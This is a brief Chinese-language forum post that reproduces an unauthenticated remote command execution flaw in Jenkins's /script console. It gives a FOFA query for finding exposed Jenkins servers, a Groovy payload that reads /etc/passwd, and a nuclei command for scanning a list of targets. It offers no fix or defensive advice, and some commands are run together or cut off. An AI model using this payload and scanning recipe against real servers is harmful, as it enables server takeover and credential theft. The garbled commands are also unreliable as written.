漏洞复现 Jenkins script 远程命令执行漏洞
0x01 漏洞描述Jenkins是一个流行的开源持续集成和交付工具,它提供了一个可扩展的插件生态系统,可以用于自动化构建、测试和部署软件项目。Jenkins系统/script存在未授权远程命令执行漏洞,攻击者通过漏洞可以执行任意命令,导致服务器失陷。
0x02 漏洞复现
fofa:app="Jenkins"
1.进入/script页面,执行cat /etc/passwd得到回
/scriptprintln 'cat /etc/passwd'.execute().text
2.nuclei验证脚本
nuclei.exe-tjenkins-script-unauth-rce.yaml-lsubs.txt-stats
页:
[1]